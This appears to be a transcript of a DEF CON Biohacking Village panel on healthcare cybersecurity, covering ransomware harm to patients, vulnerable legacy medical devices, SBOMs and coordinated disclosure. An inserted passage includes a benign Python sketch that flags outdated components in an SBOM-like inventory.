There were a lot of attempted attacks to either glean some vaccine information from what we had or just to kind of see what we were up to. And that would have upended everything. I mean, we were working really hard to get everything out as fast as we could. The trials, some of them were running concurrently, phase two, three, four. A lot of the sites performing the trials, I can tell you that the review of those was really scary and kind of quick. It was run through really quick. And yeah, just anything that would have toppled that house of cards that was barely being held together would have been horrifying. It would have pretty much stopped everything completely in its tracks and taken down whatever work we already had. And it doesn't sound, I guess, that bad since we're past that point. But there is no reason it couldn't happen again. So at the risk of asking you to toot your own horn, Bo, I mean, you and Josh, he's not here with us tonight, but you were hired at CISA specifically for the purpose of protecting this type of research infrastructure and vaccine delivery. What did the feds do right in this situation for once? He's going to have to pass on that, sorry. Hard pass. But we just want to reiterate, you know, Gab is talking about so much of the research infrastructure, the collection of data, the clinical trials, the technology to develop the vaccine, to then manufacture the vaccine. If you really take a 40,000-foot view of that, you can see as a hacker how many very vulnerable links in that chain there were. And if only one broke, if one data center containing the critical, sorry, phase two clinical data was inoperable and inaccessible, they'd have to redo all of that. And it could put us months behind. And it's not just the citizens of the United States that would have suffered; that vaccine coming to market even days or weeks later would have resulted in thousands of deaths. It's amazing that we didn't think about this stuff ahead of time, or maybe we did. And I just wanted to give a shout out to the hacker community and say this. You know, I grew up a hacker and I really think we are the ones that are screaming, this stuff is on fire. It's not just smoke. It's on fire. We need to fix it. And we've been saying this for a long time. And I think, I hope, after this they're going to take us a little bit more seriously, and we'll really be able to fix this to some more appreciable amount, so next time something like this happens it's not nearly as bad. So really, give yourself a pat on the back, okay? All right. I'm going to play a clip of Josh Corman, it's about four minutes. He was supposed to be on this panel. He couldn't be on this panel. I'm going to go over to this podium and play the four minute clip. I want you guys to pay attention. And just to give you a tiny bit of a primer, this is a discussion about patients' lives. I often get asked, show me the body count, right? It's like, you can talk to me until you're blue in the face, Quadi, about how bad this is in healthcare, but show me someone who's died. And this is kind of the primer: can someone be injured by this? So by the way, Bo, my question was a test and you passed it. These are things that affect national security, national economic security and national health and public safety. The one that's been in the red zone and the purple zone for most of the pandemic is called provide medical care. And this is what two of you do professionally every day.
We looked at severe strains throughout the pandemic, initially noticing a new problem because of the pandemic, which was cascading failures. It used to be that if you had a ransomware event or an outage or some power problem, you would merely divert ambulances to the next nearby facility. And that's kind of predicated on the next nearby facility being able to receive anybody. So when everyone's at a saturated level or in the red zone themselves, a failure in any single hospital tended to have cascading stressors or failovers in nearby facilities. So Christian, I heard similar sentiments in your amazing testimony to House Energy and Commerce. So we started studying that as well. Then we started looking at something very poorly covered in the media, but the CDC tracks something really important every year, every month, called excess deaths. And this is the difference between expected deaths and actual deaths, by condition, by month, by state, and at the national level. And when the US hit that February milestone of 500,000 lost Americans to COVID, we also hit a different milestone of 150,000 lost Americans to non-COVID conditions that are otherwise treatable, very treatable. The number one age demographic of that was 25 to 44 year olds. So young folks that could have been saved, but for excessive loads on our healthcare delivery across the country. These are time-sensitive things like heart attacks, strokes, cancer, where time matters, minutes matter, hours matter, days or weeks. So Christian and others on this panel in the past, we often cite the New England Journal of Medicine article that says 4.4 minutes during a marathon could be the difference between life and death and increased mortality rates for heart attacks. We know with strokes, the difference between life and death could be one, three or four hours. So what did four weeks of interruption in the state of Vermont do, with the UVM Medical Center and 118 facilities in upstate New York, Vermont and New Hampshire? So again, where minutes matter, we know that delayed and degraded patient care affects outcomes, including mortality rates. You know, we were deeply concerned about this, and almost numb to some of these truth bombs. But when we looked with data scientists for the first time at this fusion center, we started to ask, is there a relationship between capacity levels and mortality rates and/or excess deaths? And we're starting to share this data with the public, but without getting into the inflection points, we did see a strong and positive correlation between something like ICU bed count and excess mortality, excess deaths, two, four and six weeks later. So we got kind of a leading indicator: we could tell if a hospital or region or state was going to incur excess deaths if they were starting to reach too high of a capacity level. And then we asked the really tough question, the one I think Do No Harm cares about, which is, can cyber disruption precipitate or accelerate or cause that harm to worsen? And of course, we know fire is hot and water is wet. So of course, any degraded and delayed patient care from any source can do this. But we did start asking uncomfortable questions and looked at the states hardest hit by that concerted effort to disrupt health care during the months of October and November. And adjusting for all the other variables in a state like Vermont, it was very clear that electronically disrupted hospitals reached that excess death red zone much faster than their peer group.
So again, if minutes and hours of the difference in life and death, and you're in a geography that can't get to the next nearby facility, we should stop asking, can cyber attacks lead to loss of life? We've answered the question. There's enough statistical evidence now to show this. Wow. That was makes you feel happy inside, doesn't it? This is what we're talking about. Is it's really important to protect patient health information. It's really, really important to realize that in medical conditions where minutes matter, the hospital infrastructure if under attack and you could get worse care. I wanted to play that clip at the request of Josh's panel just to discuss briefly kind of your reflections of that because for the longest time we've gotten so much criticism and some of you out there in the crowd may have this, they've shown me the body count. You know, is this a turning point? Are we seeing more and more data? Can we now more reliably conclude that patient harm is real when a hospital gets ransomed? And what the hell do we do about it? I'm going to lay that out there. I mean, I think if you can listen to what Josh said and still think that there isn't a correlation immediately and that there isn't a body count, then you're not listening. What can we do about it? That's really hard. If you work at a hospital or you have worked at a hospital, then you already know that in some cases the choice between buying another Blinky Box or hiring a CISO, the trade-off for that is maybe you then can't buy an MRI machine or you can't hire another physician or nurse or other type of clinician. Those are really hard trade-offs to make. So when we sometimes sit back and for those of you who haven't worked in healthcare and think, well, you know, just patch stuff or just get somebody who knows what they're doing, if you're a clinical access or a critical access facility that there's no other hospital for 100 miles, let's say, you got eight beds, you got five or six doctors, a handful of nurses, which nurse is going to be your IT person? Probably none of them. But they're in the position where you can't really hire somebody in that local area because if you have IT talent, a lot of times you go to the bigger city because there's a salary there that you can't match locally. And a lot of these places are really struggling. If you look at the 20, I think it came out in 2017, the HHS Healthcare Cybersecurity Task Force report, they looked at a lot of really important profound truths and surfaced those and put them into a nice page one graphic that are here are the problems in healthcare. But they went beyond that and they said, here are some of the things we can do about it. Everything from public policy steps to some things individuals could do, things hospitals could do, carrots and sticks, incentives and punishments. And I think there's some good blueprints in there, including, for instance, can we have managed service providers that cater to the needs of these hospital workflows so that if you have an anti-spam filter and you get a bunch of emails from labs that might trip a threshold, you don't block the emails that are coming in from labs where it's critical treatment information coming in. How can we create some of the incentives that would allow for those managed service providers to do that so that you can scale up security protections or scale them down to the size that fits some of these small organizations that are really cash strapped? How can you do several other things? 
So I'd encourage you to go take a look at that. It's government reports are a little bit dry, but go check it out. And has anybody ever called your hospital to volunteer? Hey, do you guys need some help? I have a certain skill set and expertise. I'd like to see if I can help you. That might also be a step you can take or trade in, temporarily trade in a high-price job for one that's maybe a little bit lower salary, but in one of these healthcare areas where you can make a huge difference to somebody. I'm getting a thumbs up there. I take it that at least one or two people in the audience have done something like that, so it is doable. Yeah, and so one of the things I also wanted to kind of shed light on the scale of the problem, and so giving people an idea of in just what we think of as a pretty medium normal size hospital, you may have around 6,000 unique makes and models of medical devices, digital medical devices on that hospital's network. So when you start to talk about the maintaining of cybersecurity of those medical devices, that is 6,000 unique makes and models that update patches in different ways that you have to keep track of if they're patched. I can tell you from working with hospitals, the number that have a grasp on what medical devices are even on their network is just so tiny. That is such a huge struggle in the space right now, is hospitals, they don't know what medical devices they have, they don't know what's on their network from a medical device perspective. The ones that are more mature that I've worked with, that have gone through that exercise, what they've found was the medical devices actually represented about 15 to 20% of the endpoints on the hospital's network. And so that's a really big percentage of endpoints that you think of all those other hospitals that don't have those maps that don't know what those 15 to 20% of those endpoints are on their hospital networks. That's pretty scary. And so the scale of the problem is huge. We don't know what's on the networks. There's such a unique amount of just makes and models that even if you do have a grasp on it, keeping those things up to date with the patches, just full time job for dozens of people. And to Bo's point, they don't have full time dozens of people just to run around and patch medical device cybersecurity. And the other piece of it is just the legacy issue, right? Medical devices are actually designed really well, so for a medical device to perform its clinical function for 15, 20 years is not uncommon, right? But we all know there's just literally no digital components we could have put in that that 15 or 20 years later is still secure. And you can't keep patching it, right? At some point it can't run the latest and greatest of anything. So you have a lot of these hospitals really struggling with this problem of they have these legacy medical devices that still perform their clinical function, but they represent a really high cybersecurity risk to their network. So how do they decide to let go of something that's still working, right? Medical devices are not cheap. And when you think of, again, a medium-sized hospital, right, one of the ones I worked with had about 1200 infusion pumps, right? That's not even that big of a hospital, 1200 infusion pumps. You go to replace that, that is millions of dollars to replace devices that are actually performing their clinical function just fine. So where do you find the budget to do that when those devices are working, right? 
What is that bar of cybersecurity risk where you have to make that decision to end of life, that medical device? And a lot of hospitals are really struggling with that right now. Yeah. And I just want to take that problem, combine it with the problem that Josh mentioned on the video where we may have actual degradations of patient care here and turn the thinking a little bit from going from admiring the problem to understanding how this might be an opportunity to actually do something about it. And I think one of the things that is very exciting for me, bad jokes on my side, or having people who are knowledgeable about these issues from the hacker community in a position to where they can actually influence and direct policy at a number of really awesome agencies that are doing some incredible work. And Christian's not going to say this, so I will, but he's doing an operational role. He's a medical director of security at a hospital. So there are hospitals who don't look at this as something that they don't want to address, but actively invite and engage people to help them solve it. I mean, there may be a situation in the future and we can talk about the potential policy aspects here where, you know, there's a recovery and a stimulus and maybe this is something that we should address and put resources towards to help these hospitals that don't have them. I mean, I commonly think about this as a problem analogous to clinical medical disease, right? It's much easier to prevent a problem or to manage it chronically before it becomes an acute issue spiraling out of control. And so I think figuring out ways for us to turn towards those types of solutions is really interesting in this particular moment. All right, we're going to play a little game. All right, raise your hand if you think that if a hospital loses your medical records, they should be fined a lot of money. That's okay. All right, keep, all right. Keep your hands up if you think that that's going to make healthcare cheaper for you. All right, keep your hand up if you think healthcare is cheap. Tell me if you think it's going to get cheaper in the next 20 years. We have a, oh, I hope so. I really hope so. And maybe so. I need to talk to you because you have the solution and I don't know what to do. So we get these hospitals, we've talked about how hard the problem is, how they don't have the people to help them, how they're up to their necks in vulnerable legacy medical devices and infrastructure that's very fragile. They get owned and they have a big breach and they have to pay millions of dollars in fines. And then it's going to probably increase healthcare costs across, and Bo talked about the tradeoffs that hospitals have to make if they pay a big fine, how much money are they going to have left over to fix the freaking volums that got owned to start, right? It's a really hard problem, but we have to hold people accountable and organizations accountable for this. And we're in a really hard spot. You know, there are cyber, I'm sorry, I'll drink a whole case of Red Bull later. I'm freaking sorry about this. All right, but there are cyber haves and have nots in healthcare. There are hospitals that have marble floors and palm trees in the waiting room, right? Those exist and they're doing a lot better. And then there are rural hospitals and critical access hospitals that bleed millions of dollars every year and the only ones taking care of patients for 500 miles. And if that hospital didn't exist, people would die. 
They're the ones with shared credentials, still running Windows 7. They're the ones that can't afford new infusion pumps, and we want to fine them a lot. So I'm not saying let's pity these hospitals, but we've got to figure out, well, how do we fix this problem? And I just want to see a hand up. Would you as a taxpayer be willing to pay to have healthcare be more secure? Raise your hand. Would you be willing to spend taxpayer money on it? Oh my. Don't take a picture, because it's against the rules, but this is the sentiment, right? It's a shared thing. The pandemic has reminded us that we all share this ecosystem of healthcare. It's really fragile, and it's unacceptable that it remains in this state. And what we really need to do is raise the entire ecosystem's security resilience. I'm going to just quickly say, I worked in the ER on a Monday. And if you work in the ER, you know that Monday is the worst day to work. They're always the busiest. I was working on a Monday and the waiting room was blowing up. Wait times were skyrocketing. Patients were staying in the emergency department, sometimes two or three days, waiting for beds upstairs. What happened? It wasn't even us that got hit with ransomware. It was a hospital system in the same town as us, right? It's an ecosystem of care. And if we don't build up the resilience of the entire ecosystem, guess what's going to happen to the ambulance transport time if you have a stroke or a heart attack and you have to bypass those five other hospitals that are on diversion because they got hit with ransomware. Guess what? Your time is going to be longer. And that's not going to do well for your heart or for your brain. Maybe it's the difference between whether or not you walk or talk or eat or live or need to have a pacemaker implanted in your body. Sorry for the rant. Anyway, reflections on that before I move on to a less depressing topic? No. No. Raise your hand if you're familiar with software bills of materials. Anyone? All right, rad. I'm going to quit talking, because there's this thought about software bills of materials as a potential mechanism to reduce vulnerabilities, or at least identify vulnerabilities and patch them sooner. I'm going to open it up to the panel here. Briefly talk about SBOMs, and then as well whether or not they're going to fix all these problems. Is this the magic secret sauce? Yeah. So I'll start this. So for those who said you're familiar with the SBOM, one of the things everyone in the room might not realize is that I actually credit the healthcare and medical device space with being one of the first industries to really rally around this concept. So the NTIA working group that was really building the foundation of what is now becoming a NIST standard based on that working group's work, that was actually very heavily run by the healthcare industry. And so the healthcare industry has had several years of working on SBOMs. If you look at that draft pre-market guidance that I mentioned, that the FDA put out about two years ago, you'll actually see that that was one of the requirements inside it. They called it a CBOM at the time. They're updating it to be called an SBOM to align with industry terminology. But this whole concept of an SBOM is really polarizing. It's very interesting to talk to people who are just immediately against this, thinking like, oh my God, we're just giving a roadmap to all the attackers.
And I'm one of the people on the side of the fence that actually says this is actually a really good thing, right? The attackers are going to figure out the roadmap. They're going to figure out what's in your device anyway. Instead, let's enable the good guys to actually have that list of ingredients that's inside of our devices. And so for anyone following on the policy side, earlier in May, there was an executive order that came out here in the United States around sort of this supply chain transparency. And one of the things hidden inside of that was around the SBOM. And so that's why you start to see that initial NTIA working group around the SBOM actually now getting translated into a NIST standard. And so much more of a spotlight has been brought onto this topic of the SBOM since that May executive order. But the healthcare space has actually been really working on this for a number of years. And some of the initial formats, like CycloneDX, I'm trying to think of the other two. I'm totally blanking on the other two formats. But a lot of the work around getting SBOMs to actually be operationalized is getting around consistent formatting and consistent nomenclature. And so the healthcare space has been working on that for several years, trying to actually figure out, you know, how do we, one, generate SBOMs in a consistent manner? And then how do you get use out of them, right? So we've had a lot of hospitals who are actually trying to use SBOMs, and they struggle on both sides of it. And so I would encourage anyone who's interested, the NTIA working group actually put out a report around how we tried to use SBOMs in the medical device space, how hospitals tried to leverage them, and a lot of the struggles, basically, that are still in the works of being tackled. Like how do we make this really impactful in the healthcare space? And to Bo's point earlier, anyone in this audience who is interested in that topic, absolutely get involved. Those working groups are open. You can reach out and join any of them. We absolutely need as many security people as we can working on these topics. Any of the guidance around cybersecurity for medical devices, I would encourage anyone in this audience to join them. We need those guidances. I will say I have sat on a number of those working groups around any kind of regulation, guidance document, technical frameworks that come out for the medical device security space. And they're so influential in the space, but I can tell you a lot of the working groups really lack subject matter expertise. There's a lot of people who write standards as their day job. And I love them, got to have people who love writing standards. But what we're lacking in a lot of those working groups is the security expertise. And it's not sexy work. You will sit on phone calls where you listen to people argue about where commas should be for literal hours. Not joking. And it is incredibly painful, but at the end of the day when those regulations come out, they need cybersecurity expertise to make sure that those are actually impactful. So same thing with those working groups. That NTIA, we need more security people. So anyone in this audience, if you want to make an impact, one of the biggest ways you can do it, if you're not willing to sort of change jobs and change your salary, join those working groups. Be a subject matter expert on any med device security working group. If you're not sure which ones to join, absolutely reach out to me.
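For readers who have never seen one in practice, the short sketch below illustrates the kind of component inventory an SBOM carries and one way a hospital might consume it programmatically. The dictionary layout loosely mirrors a CycloneDX-style components list, but the component names, versions, and end-of-support dates are invented purely for illustration; none of them come from the panel or from any real device.

# A minimal sketch of consuming an SBOM-like component inventory.
# The layout loosely mirrors a CycloneDX-style "components" list; the
# component names, versions, and end-of-support dates are hypothetical.
from datetime import date

sbom = {
    "bomFormat": "CycloneDX",   # assumed format label, for illustration only
    "specVersion": "1.4",
    "components": [
        {"type": "library", "name": "busybox", "version": "1.21.0"},
        {"type": "library", "name": "openssl", "version": "1.0.2k"},
        {"type": "operating-system", "name": "example-rtos", "version": "3.2"},
    ],
}

# A hospital-side table of components already known to be past support.
# In practice this would come from vendor advisories or a vulnerability feed.
end_of_support = {
    ("openssl", "1.0.2k"): date(2019, 12, 31),
}

def flag_stale_components(bom, eol_table):
    """Return (name, version, eol_date) for components past their known support date."""
    stale = []
    for component in bom.get("components", []):
        key = (component["name"], component["version"])
        if key in eol_table and eol_table[key] < date.today():
            stale.append((component["name"], component["version"], eol_table[key]))
    return stale

if __name__ == "__main__":
    for name, version, eol in flag_stale_components(sbom, end_of_support):
        print(f"{name} {version} went end of support on {eol}")

Even a toy check like this hints at why the ingredient list matters on its own: once an owner can see what is inside a device, they can start asking pointed questions about support lifetimes and known vulnerabilities at purchase time.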
I can send you a list of stuff, but please be on those working groups and lend your security voice. For those who aren't familiar with SBOMs, software bills of materials, the idea, as a gross oversimplification, is that it's like an ingredients list on your food, right? What's in the thing that you're using? And Dr. Marie Moe, who is herself a pacemaker patient, sometimes says that she can know the ingredients that go into the candy bar she's eating, but she can't know the ingredients that go into the pacemaker that keeps her alive. And in another very oversimplified example, if you look at two extremes, and, you know, a software bill of materials is not either of these extremes, but two extremes. One where manufacturers have no idea what goes into the products that they make and sell you, and one where they have full visibility into what goes into the products that they make and sell you. Which one would you rather be at? Anybody want manufacturers to have no idea? Where's your hand? Christian does. He's in that camp. That's cool. But in some of the last few years when hospitals have started asking medical device makers to provide a software bill of materials, it caused those medical device makers to have to figure out what's actually in their software, what's in their hardware. And they said when they looked into it, it scared the hell out of them. And they issued updates not because there was a new vulnerability announced, but because they found out that there were very old vulnerabilities that were causing undue risk. So the act of asking to reveal what's in your software, what's in your hardware, can have that catalytic reaction. Even if, to your point, even if the hospitals themselves don't know how to use it, the act of asking can create that. And in financial services organizations, they've been doing this for a while. One of the people who participated in some of the NTIA conversations said that they were at a large bank and they asked for a software bill of materials. And if the manufacturer of that software couldn't tell them what's in their software, then they asked them for a 20% discount because they knew that they were going to have to layer on extra security on top of whatever they bought because they couldn't account for what was actually there. So there's many, many uses for a software bill of materials, whether you keep that internal to the organization that's developing the software or whether that's something that's requested and passed on through the supply chain. Just to add on to that a little bit, I mean, as someone who's sat on a pharmacological review board as well as a recombinant DNA review board, we analyze every single ingredient that goes into every single pharmaceutical that is out there. It's tested over and over again. We know exactly where it came from. You know, what modifications it has, things like that. Why wouldn't we want to know what configurable pieces go into medical devices? All right. So if you've ever been to Do No Harm before, you kind of know that we do this for a little bit. We're going to take a couple audience questions for the full panel. And then what we're going to do is we're going to break up and each one of the panelists is going to go into a corner or so. You can congregate around them. We'll get to that in just a moment. I have one last question for the panel before we take open Q&A. And that's going to be, I'll first say, who here is invigorated, or sorry, who here is depressed after watching this talk? Yeah, raise your hand. It's okay.
Who here, oh, you guys are already depressed? So you couldn't get any more depressed. Okay. Well, if you need antidepressants, Jeffrey at the end can write you a prescription for some. They take a while to kick in. So we encourage you to start now. How many of you are not depressed, but maybe like invigorated to like try to go and try to help this problem or try to contribute to make things better? Oh, that's amazing. That's my last question for the panel. Each of us could take an opportunity to say, for the hackers in the audience, what can they do individually besides what we've already talked about, you know, take a pay cut and go work for a hospital? Anything else that you and the audience could do to make this better, sit on standards, et cetera? But anything else to take away before we open up the Q&A? I'll say talk to your own doctors and nurses and people you interact with as a patient and make sure that they're up to speed on some of these issues. They don't have to be experts, but make sure that they are aware of the fact that this is becoming something they should pay attention to. Yeah, and so I already mentioned the working groups, so absolutely the working groups. But beyond that, if you work as a vendor that is in the software security solution space, right, so maybe you guys make some widget that is supposed to help with cybersecurity, think about how that widget may help the healthcare space. There's a lot of general purpose sort of security widgets out there that just don't work in the healthcare space. Either the medical devices are too resource limited, they have interesting operating systems, or they cause too much of a delay on the system for things that have real-time signal processing. There's a lot of general purpose security widgets out there that literally just do not work in the medical device security space. So they're also very limited in some of the solutions that they can just generally adopt. So if you worked at one of these tool vendors, maybe bring up the fact that like, hey, what do we do about the medical device space? Is there something we could pivot our software product to do? And then of course, obviously just go work for a medical device manufacturer or a healthcare organization. I don't know a single one that does not have open job reqs right now for security people. I mean, it's kind of a conglomeration of the previous ones, but ask a lot of questions. You know, question everything, do your research, visit the villages that are, you know, messing around with your medical devices and your infrastructure and just be that kind of force that can continue to be an advocate for this kind of thing. Yeah. There's a lot of good things that have already been said. I'll say something that's slightly different, which is states actually hold a lot of power over healthcare. States, in a lot of cases, are the regulator of hospitals and others. So a lot of time there's a big focus on the federal legislature, on federal public policy, but states also do a lot of public policy. And a lot of times they don't get the help and support from the organizations that tend to frequent DC. So wherever you live, you have a state government unless you live outside of the United States, in which case you have another type of local government. And oftentimes, you know, you can just call up whoever your local representative is and say, hey, I have a certain skill set. I'd like to offer it to you. Do you have anything that's going on? Or, you know, ask them for a briefing.
You'll get 15 minutes and you can go talk about healthcare security and some of the consequences and some of the other things. And just having those conversations sometimes will lead to them taking some action. Maybe it's writing a letter. Something as simple as writing a letter, even from a state legislator, can make a big difference in nudging hospital administrators or medical device makers or doctor boards or others into a situation where they actually consider security as a part of whatever they're working on, whatever they're doing. Awesome. I just got one thing to say. I think one of the most important things that happened in this space in the last, you know, 10, 11 years was that hackers out there went out and got medical devices and started poking at them and started finding what was wrong with them and brought that to our attention, whether it be Kevin Fu's group talking about pacemaker AICDs, or Barnaby Jack before he died talking about that, or Jay Radcliffe's infusion pump, or Dr. Marie Moe, you know, reverse engineering some crypto on her own pacemaker. These are the types of things that hackers do really well and we need more of that. We need more of you out there doing some device research. It's, believe it or not, pretty easy to get a medical device. Depending on the medical device, you'd be kind of shocked how easy it is. Poke, prod, bring your research to a place like DEF CON. Teach others around you, because that action, those hackers that went and did that research and brought it to everyone's attention, they really freaking moved mountains, I'll tell you. Right? The FDA did great things in response to the research, had security researchers' backs, and as long as you do it in a safe and responsible way, using things like coordinated vulnerability disclosure, being responsible about that, knowing that these vulnerabilities can really impact human life, doing that type of research and hacking on things like we do can really make a big difference. And so I would encourage you out there to do it and to do it right and to be responsible with it, but that can help us really change a lot of minds. Oh yeah. So to add one thing to that, I mentioned I used to work at the FDA, I worked there for a year on a one-year program. They really want to hear from you. In 2012, 2013, 2010, when some of the initial hackers were doing their research on medical devices, security wasn't as prominent on their radar. Today, they're all bought in. I mean, come on, they hired me to come in and help them. They actively recruit, they're not here this year of course, but in the past several years, they've been out at the Biohacking Village going to talk to hackers, going to talk to medical device makers, making sure that medical device makers know that they expect a certain level. And in fact, one of the things that we pioneered was a website called We Heart Hackers, wehearthackers.org, where the FDA, the director of the FDA came out and said, we want more medical device makers to put their devices in the hands of hackers so that they can find the bugs before they become harmful. And so if you're researching medical devices, if you have done your diligence to report to a medical device maker, the next step should not be public disclosure. It should be coordination, if not with the medical device maker, then with the FDA. They want to hear from you. And they can pull levers that you can't.
They have an amazing suite of capabilities that they can use to figure out what the right thing is, not for the medical device maker, not for your ability to drop O-Day at Black Hat, but for patients. And that's what this is really about. It's about patients, it's about healthcare, it's about those vulnerable people who really need us. So I just wanted to add that. Awesome. All right. Well, we're going to take some questions for the full panel. I'm going to ask you the following. If you could come up a little bit closer to the stage, please do not spew COVID on anybody. I ask a question, I'll repeat it. There might be some questions that are off limits, but I don't really think that's probably going to be a problem here. And then if you want to save your question to an individual panel member, after we take a few questions, we're going to break up. And then again, I'm going to remind everybody, respect people's COVID precautions, don't get too close, wear your mask, especially with our panelists as they're around and the people around you, because we're a community of hackers, we're a family. Last thing we want to do is hurt each other. Okay? Any questions? Okay. Okay. Yeah. So the question was, how do you get software and I'm assuming hardware vendors who come sell a product and leave and never give support or how do you address that issue? Because it's a really huge one. Does that make sense? Did I encapsulate that well? I think it was acquisition. Yeah. Medical device makers that get sold to other medical device makers too, right? So how to deal with shitty vendors? Yeah. So I guess I'll rephrase it not from shitty, but vendors who are not very clear about communicating end of support. So one of the things that several manufacturers are trying to do is make it very clear, kind of like Windows, right? When Microsoft releases Windows, they tell you the second that comes out when you're going to stop getting support for that operating system. So you can make a decision on what you're going to do with that operating system because you know when support's going to end. Manufacturers are still very early in that maturity of announcing how long are you going to support this medical device that I'm selling to you. So you do have instances of manufacturers continuing to sell medical devices and you just, you literally have no idea when they're going to end support or end of life that from a security update perspective. So there are some manufacturers who are working on this concept of this end of support, end of cybersecurity support, that when you buy that device, you know, but I would say right now that's still in its kind of infancy of its maturity cycle. So it is, the big ones are aware that that is an issue. They have not solved it yet. You mentioned it earlier, the FDA's post-market guidance. The FDA actually set up something new with medical devices so that security issues can trigger recalls. At the same time, they gave a carrot to manufacturers. They said if you meet certain thresholds, you don't have to do a recall. A recall in healthcare is a big deal. So if you know about security vulnerabilities in a product, you can report that to the medical device maker. Again, if they don't do anything about it, you can talk to the FDA. As long as those devices are out there, that manufacturer has a responsibility to monitor safety, potential safety issues. And that's what cybersecurity issues are, according to the FDA. 
So there's a hook there that you can use to get at least awareness and attention. And when one of the researchers, Billy Rios, looked into security of some infusion pumps, even though the manufacturer no longer sold the pumps, they were required to issue an update or try and pull them off the market. And so that's what they ended up doing. And that manufacturer actually changed a lot of what they did. And they became, I think it was them that they became the first manufacturer that went through the UL certification for security. They've been at the DEF CON biohacking village device lab every year that we've had it. So the act of causing them to have to pay attention to security changed a lot of the way that they did business. So I would say use those mechanisms that already exist to go through those types of channels that they pay attention to already. Is there any data related to other countries with very different, top-tier delivery environments in the U.S., like the North and South of the States, those incentive structures have led to better outcomes in the space, whether it's more secure devices, like the calls from organizations that are more effective at controlling them, or is there any comparison to that? Thank you for the excellent question. If I could kind of distill the question down at the heart of it is, do we have data to be able to measure or do we have data to compare certain interventions, right, potentially between countries, for example, have different types of health care systems? Do we have very basic measurements of whether or not things work and whether outcomes are better if there are more secure health environment, for example? Okay. I'm going to take the stab at this because this is a little bit of a passion of mine. It is amazing to me how little data we have, right? When you drive a car or when you go and do something of importance, when they make a product, they collect a lot of data, and they make decisions off that data because it matters. In healthcare cybersecurity, again, I swear I'll drink a whole case of Red Bull for you guys. I'll give myself heart palpitations. We have no data. I would love to be able to do a study that compares, you know, take country A that has a nationalized health system and is quite secure, for example, comparatively to a lot of hospitals that are in the United States, and let's take a measurement of their heart attack victims and say who has better outcomes, or who's more resilient to ransomware, or what type of interventions in a hospital or mitigation, security control mitigations in a hospital actually result in less ransomware attacks. We don't have any of that data. We don't have the sophistication to even begin to ask those questions. We have to build the whole infrastructure. We have to get people to believe this is an actual issue. We have to put in place the sensors and epidemiology to collect that data, then analyze that data. We've got to train researchers to do this. And what I'm trying to say is, unfortunately, it's a dismal thing to even think about. All we have right now are anecdotes. We don't even have evidence. We have stories. And Jeff mentioned, or not Jeff, Josh mentioned on the video that we are now starting to collect that data in some cases and publish it. I do think in a silver line to this, right now we don't have the data. I think 2021, 2022 is going to be a banner year for this. 
I think we're going to finally get some published peer reviewed data out there that says that ransomware attacks hurt people, not just their protected health information, but their actual lives. And that, I hope, is a catalyst for positive change moving forward. I hope it encourages a lot of other people to want to study this more regularly, because that's what we're going to need if we're really going to, you know, move the needle on this. Sorry, anyone else? I'll build a little bit on that. While we don't have data, we do have some empirical evidence. One of the things that several of us do is we run an event called the CyberMed Summit. And the CyberMed Summit, one of the really cool parts of it, and one of the things that I think has been eye-opening for a lot of people, is these clinical simulations. So just like pilots go into a flight simulator, so the first time they land in 30-knot crosswinds and fog is not the first time they've ever experienced that. They experience it in a controlled setting. Doctors do the same thing. And what these two geniuses on the end did is they created clinical simulations that replicate what they do. They did that replicate what would happen if there's a security issue with a medical device, whether it's, you know, ransomware of a lab system, whether it's a pacemaker that's been hacked, whether it's an insulin pump that's been hacked. And based on the evidence that you can gather from how doctors actually go through in this simulated environment, in this controlled environment, we actually know a lot about what would happen. And not just what would happen with the patient, but what happens next. Do the doctors say, I think that device got hacked, or do they just send it down to Biomed to see if it can be updated or, you know, reset? Do they blame the clinicians who are in the room with them for, you know, setting the wrong drip rate on the IV, or do they say, I want this investigated and we need to do a root cause analysis on what caused this? And I think what we found is that the awareness among physicians is not necessarily there. The awareness among health centers is not necessarily there. Even when it is there, you may not have the data on the device. You may not have logs. So you may not be able to tell what happened. Even if you have the data, the Biomed people might not be able to read it because it might be in a format they don't understand or in a way that they can't get it off. If they want to send it to the manufacturer, the first thing the manufacturer does is says, wipe all the data. We don't want any patient data on it. So, you know, it's hard to get the evidence, but I think Christian's right. I think that 2021 is going to be a year where we see a drive towards acquiring, reviewing, analyzing, publishing data, statistical information, and the types of things that we need to change doctors' minds because they are scientifically driven. And if it's not in a peer-reviewed journal, it's for them just anecdotes. That's great because they build off education. They build off knowledge over years to do something that is statistically relevant, but it also slows down our ability to change health care. I'm just going to let the next person know. Can you repeat the question? He actually works at a hospital and so they had an incident where a machine actually did get, like, a conficker, which is, you know, we should be resilient to that at this point. 
And, yeah, of course, their solution was we'll take it offline, turn it off. Like, well, you can't, the PACS serves a very critical role inside of a hospital system. It has to literally be on the network or it serves no purpose. And so his question was, like, how do we fix this, right? So one of the most powerful things I've seen is hospitals actually literally using cybersecurity in a purchase decision and literally saying no when it doesn't meet their cybersecurity bar. And so, you know, the FDA and the regulatory bodies, you know, they're raising the bar, but at the end of the day if a manufacturer can't sell to you as a hospital, that keeps them up at night. But I also will say a lot of manufacturers are doing better. But the biggest lever you can pull as a hospital is at purchase time. Make sure cybersecurity is part of that purchase decision, and if it doesn't meet your cybersecurity bar, then you have to be willing to not buy that device. And this is a hospital system that cares more about that bar than most hospitals. So, yeah, I think that's the case. Well, and it's hard, like what I'm saying, like, it sounds easy in principle, it's not, right? And at the end of the day if the device provides a clinical function that is better than all of the competitors and its security is worse, at the end of the day, you know what, patients come first and you have to still buy that device. But there's a lot of competitive devices out there. So if there's another device that serves the same clinical function with like similar efficacy, buy the one with better security. I take it you guys and gals don't really like vendors. Is that, is that a common thing? But see, this is why you have to help vendors: go work with them, right? So I've consulted with them for years, like they actually want to do the right thing. They do not have the resources to do the right thing. All right, we're going to go ahead and wrap up. I'm sorry, please, we're hanging out here. We're going to get you to the right questions and the right people, but I think it's important for us to break up. It wouldn't be a Do No Harm if you couldn't come face to face with a panelist and ask, like, hard questions. So, all right, again, to reiterate, find whatever speaker on the panel you want in a corner, ask them a question, mask and distance and move around. If you see someone that's particularly swamped, maybe go to another and then come back. It's going to be a little bit of a give and take. Thank you again, DEF CON, for this. Please give yourselves a round of applause. All right, come talk to us. Yeah, and I was just going to apologize. I actually have to run, but if you have questions, I love talking about this topic. Find me on LinkedIn, Stephanie Domas, you can find my name in the program. But if you have questions for me, I would love to answer them, but reach out to me online. Sorry.
|
